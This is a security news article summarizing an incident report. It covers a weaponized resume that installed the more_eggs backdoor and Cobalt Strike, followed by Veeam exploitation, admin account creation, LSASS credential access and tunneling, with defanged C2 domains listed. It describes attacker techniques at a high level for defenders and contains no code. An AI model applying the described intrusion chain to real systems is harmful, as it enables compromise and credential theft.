Hackers Used Weaponized Resume To Infect User & Moved To Server Environments – Incident Report

Uncategorized December 2, 2024

A sophisticated cyber attack was detected in March 2024, revealing a complex intrusion that began with a weaponized resume and culminated in the compromise of multiple servers.

This incident highlights the evolving tactics of threat actors and the importance of robust cybersecurity measures.

The attack strated when a threat actor, identified as TA4557 by Proofpoint, submitted a malicious job application.

This group has historical connections to FIN6 and shares tooling similarities with Cobalt Group and Evilnum.

Security analysts at The DFIR Report discovered that the victim, lured by a fake online resume, downloaded and executed a malicious .lnk file from a zip archive named “John Shimkus.zip”.

Fake Resumes (Source – The DFIR Report)

Leveraging 2024 MITRE ATT&CK Results for SME & MSP Cybersecurity Leaders – Attend Free Webinar

Infection Chain

The infection process involved several stages:-

  1. Execution of a Windows Shortcut (.lnk) file
  2. Abuse of ie4uinit.exe (a legitimate Microsoft executable)
  3. Deployment of the more_eggs backdoor
  4. Installation of Cobalt Strike beacon

The initial payload used obfuscated commands to create an .inf file and move a legitimate copy of ie4uinit.exe to a custom location.

Infection Chain (Source – The DFIR Report)

This technique, known as LOLBin abuse, allowed the attacker to load and execute COM scriptlets from remote servers.

The more_eggs backdoor was deployed using the msxsl.exe binary, a technique documented in the LOLBAS project.

This malware established persistent communication with the command and control (C2) server using a scheduled task for persistence.

After initial infection, the threat actor:-

  1. Deployed Cobalt Strike on the beachhead host
  2. Exploited CVE-2023-27532 in Veeam software on a backup server
  3. Created new local administrator accounts
  4. Used RDP to connect to compromised servers
  5. Installed Cloudflared for tunneling traffic

The attacker used a modified version of VeeamHax to exploit the Veeam vulnerability, enabling them to execute arbitrary SQL commands and create a local administrator account.

VeeamHax Difference (Source – The DFIR Report)

The threat actor employed various techniques for credential access and network discovery:-

  • Accessed LSASS memory for credentials
  • Used tools like Seatbelt and SharpShares for enumeration
  • Executed adfind.exe for domain reconnaissance
  • Utilized SoftPerfect Network Scanner for network mapping

Two primary C2 channels were observed:-

  1. more_eggs payload communicating with pin.howasit[.]com
  2. Cobalt Strike beacon connecting to shehasgone[.]com

Here below we have mentioned the timeline:-

Timeline (Source – The DFIR Report)

This incident demonstrates the sophisticated tactics employed by modern threat actors, combining social engineering, exploitation of vulnerabilities, and advanced post-exploitation techniques.

Organizations must remain vigilant and implement comprehensive security measures to defend against such multi-stage attacks.

Analyse Advanced Malware & Phishing Analysis With ANY.RUN Black Friday Deals : Get up to 3 Free Licenses.

The post Hackers Used Weaponized Resume To Infect User & Moved To Server Environments – Incident Report appeared first on Cyber Security News.